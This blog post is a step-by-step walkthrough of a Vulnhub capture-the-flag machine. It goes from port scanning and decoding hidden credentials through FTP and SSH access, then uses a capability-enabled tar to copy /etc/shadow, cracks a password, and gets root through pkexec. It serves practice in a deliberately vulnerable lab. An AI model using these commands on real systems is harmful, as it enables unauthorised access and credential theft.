In this blog post, we will try to provide a comprehensive solution to the Finding My Friend CTF from Vulnhub.
After downloading the CTF from vulnhub, we then import it and disable the serial port from the setting to be able to run the machine.
Note that we also set the network to NATNETWORK, same with our Kali Virtual Machine (Attacking machine). This will ensure that both machines are in the same subnet.
Next up, we have to find the IP address of the vulnerable machine from our attacking machine terminal, using the netdiscover command. Always remember to give the subnet address with which we use to run the netdiscover command - sudo netdiscover -r 10.0.2.0/24.
We see that the target machine has IP address of 10.0.2.6. We then use nmap to find open ports using the command nmap -sV 10.0.2.6.
From the nmap scan we see that we have 3 ports open - 21/ftp, 22/ssh and 80/http. We also note the versions run by each port as they come handy during reconnaissance.
Navigating to the browser to open the http page on http://10.0.2.6:80, we see this:
We can scroll down the page to see if we can identify any flag. We can also inspect the page source. However, there are no flags here.
Since we couldn't find any flags, let's do some directory busting using dirb. We use the command to do the busting dirb http://10.0.2.6:80 /usr/share/wordlists/dirb/common.txt
We see that we found 3 paths through the busting - /friend, /images, /index.html. Navigating to the browser again to access each of the paths
Accessing /friend
We note the conversation on the browser and notice the last statement below:
Then we inspect the page source to see if we can find anything.
We find the string commented out in the page source, NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc= and this happen to be base64 encoded (You will have to find a means to known what type of string such is if you are not familiar with base64).
Now, we go over to the terminal and decode the string like so echo NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc= | base64 -d
Decoding the string, we see that it results in a hex encoded string. We can decode the hex string using Cyberchef.
We see that we get the credential capture:hunting. Now let's try to connect to the ftp server on port 21 using the username as capture and password as hunting.
From the image, you can see that our attempt was successful. We now try to find for sensitive files on the ftp server. Using the ls -la command we find the following file as shown
we can use the get command to download the files from the ftp server to our attacking machine, get <filename>
Next we can inspect these files from our machine
flag1.txt just contains the string tryhackme{Th1s1sJustTh3St4rt}, which is not useful to us.
note.txt contains the string I have an image but I’m not able to open it. Can you help me to open it?. This gives us a hint about an image we can be seen above .get.jpg.
We open the image with the command xdg-open .get.jpg to see that it is a map image.
From the hint given by note.txt we can suggest if some data are hidden in the map image(steganography). Let's use stegcracker to bruteforce and get the password.
stegcracker .get.jpg
We see that the password used for the steganography is pollito. We also note that the extracted data was written to .get.jpg.out. Now let's view the content.
We see that the hidden content is a morse code. We can decipher it using cyberchef.
Deciphering the morse code give use the credential , JOHN:BOOGIEWOOGIE. This could be a credential for a user. So, let's try to connect via ssh (use the credentials in lower case).
We now have access as john via ssh. Now we look to gain root. We first find sensitive files as john.
Accessing the files found:
flag2.txt contains the string tryhackme{gI33fuIbutM0r3t0gO} which isn't quite useful to us.
clue.txt gives the message You need to find which college is she studying.
Hint: Her brother parth knows that.
Let's see if we can find the user parth.
We see there's a user parth, however, we do not a permission to access the folder.
Now, we try to find a way around it. Since, it looks like have reached a dead end, let's try to find the bypass capabilities of files within the server using the command: getcap -r / 2>/dev/null
We can see that we have a file with bypass read permission and executable capabilities(the first file).It can also perform any executable permissions on directories.
Since the /etc/fonts/tar can bypass the read permission checks and directory read and executable permission checks, we can make a tar copy of the /etc/shadow file with the command:
/etc/fonts/tar -cf /home/john/shadowcopy.tar shadow.
You must be in the /etc directory to run this command.
Now let's verify that there is a shadowcopy.
We extract the shadowcopy.tar file with tar -xvf shadowcopy.tar to get the shadow file and get parth hash with the command cat shadow | grep parth.
We can then copy and save the parth hash to a file and crack it using john the ripper.
Parth password is johnnydepp.
Now we switch to parth as user.
We see that we get a clue from honey.txt
We reach yet another dead end here. Let's try access the "..." folder. We still cannot do anything. It is time to introduce linpeas to find what we can exploit to gain root.
We set up a python server with the command python3 -m http.server 5500 on our attacking machine. We then connect to the server and download the linpeas.sh on the target machine.
Attacking Machine:
Target Machine:
Next, we grant executable permission to the linpeas.sh file and run the file. Running the file with ./linpeas.sh we get to identify Pkexec.
Head over to the link to know how to exploit pkexec.
Now, we try to become root with the command : pkexec /bin/bash. However, we get an error.
We can fix this error and gain root by using two ssh sessions.
On session 1, we enter the command echo $$
Then in session 2, we enter the command pkttyagent --process <session_1_id>
Then in session 1 terminal we enter the command pkexec /bin/bash
We are then prompted to authenticate as user in session 2 terminal of which we use parth and the authentication is successful.
Then we head over to session 1 terminal to see we have successfully gained root access to the machine.
Disclaimer: This solution is provided solely for educational and practical purposes. It is intended to demonstrate the techniques involved in solving cybersecurity challenges and to encourage ethical hacking practices. Any misuse of this information is strictly prohibited and may have legal consequences.
References
Linux Capabilities - https://man7.org/linux/man-pages/man7/capabilities.7.html
An Introduction to Linux Capabilities - https://earthly.dev/blog/intro-to-linux-capabilities/
Linux Capabilities - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
Linux Privsec - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2